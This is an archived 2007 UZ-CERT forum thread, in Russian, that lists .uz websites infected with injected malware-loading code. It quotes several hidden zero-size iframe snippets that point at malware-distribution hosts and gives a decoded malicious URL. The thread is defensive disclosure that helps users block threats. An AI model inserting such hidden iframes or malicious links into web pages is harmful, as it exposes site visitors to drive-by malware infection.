uForum.uz

uForum.uz (https://uforum.uz/index.php)
-   UZ-CERT (https://uforum.uz/forumdisplay.php?f=494)
-   -   Лента: УГРОЗЫ НА САЙТАХ .UZ (https://uforum.uz/showthread.php?t=2562)

Eldar Ishimbaev 19.09.2007 15:08

Лента: УГРОЗЫ НА САЙТАХ .UZ
 
Уважаемые пользователи!

В связи с участившимися случаями внедрения вредоносного кода на веб-сайты доменной зоны .UZ решено открыть данный тред, в котором мы будем публиковать названия зараженных сайтов, которые могут предоставлять угрозу и инфицировать пользовательские рабочие станции вирусами и троянами.

По устранению угрозы на сайте мы будем давать анонс о безопасности ресурса.

Если вы самостоятельно обнаружите какой-либо инфицированный сайт, то просим вас сообщить нам об этом по этой ссылке.

Dmitry Paleev 19.09.2007 15:29

На веб-сайте hттp://www.me.uz были обнаружены сразу две ссылки, загружающие вредоносное ПО на компьютер пользователя.

Первая вредоносная ссылка:

[HTML]<html><iframe src=http://oya.ru/vyhod/numizmat/ima/ frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe></html>[/HTML]

Вторая вредоносная ссылка:

[HTML]<iframe src="http://zlo-x.net/XDS/iframe.php" width=0 height=0 border=0></iframe>[/HTML]

Просим с осторожностью заходить на указанный веб-сайт до решения проблемы и заблокировать вредоносные ссылки в своих межсетевых экранах.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:33

www.arksugurta.uz
 
На веб-сайте hттp://www.arksugurta.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->
После расшифровки кода (а зашифрован он аж 4 раза) получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:42

www.elgroup.uz
 
На веб-сайте hттp://www.elgroup.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 7 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:46

www.innovation.uz
 
На веб-сайте hттp://www.innovation.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 2 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 14:50

www.iptv.uz
 
На веб-сайте hттp://www.iptv.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в одном месте файла index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:38

roller.sarkor.uz
 
На веб-сайте hттp://roller.sarkor.uz были обнаружены 2 вредоносные ссылки.

Первая ссылка:

Код:

<iframe src="http://lilohost.hk/cgi/index.php" width="0" height="0"></iframe>
Вторая ссылка:

Код:

<iframe name=857699b070 src='http://alltraff.ru/lol.php?1003893b72477f' width=761 height=186 style='display: none'></iframe>
Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

Dmitry Paleev 20.09.2007 15:50

www.versal.uz
 
На веб-сайте hттp://www.versal.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 3 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:55

www.asus.uz
 
На веб-сайте hттp://www.asus.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 1 месте в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.

Dmitry Paleev 20.09.2007 15:59

www.glob.uz
 
На веб-сайте hттp://www.glob.uz был обнаружен код, загружающий на компьютер вредоносное ПО.
Код находится между тегами <!--[z0s]-->вредоносный код<!--[/z0s]-->

Внедрен он в 9 местах в файле index.

После расшифровки кода получаем следующую ссылку: hттp://dodo32.org/505/Xp/

Просим с осторожностью заходить на данный веб-сайт до разрешения инцидента и заблокировать в своих межсетевых экранах вредоносную ссылку.

update: Сайт излечен. Вредоносный код убран.


Текущее время: 13:45. Часовой пояс GMT +5.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd. Перевод: zCarot
OOO «Единый интегратор UZINFOCOM»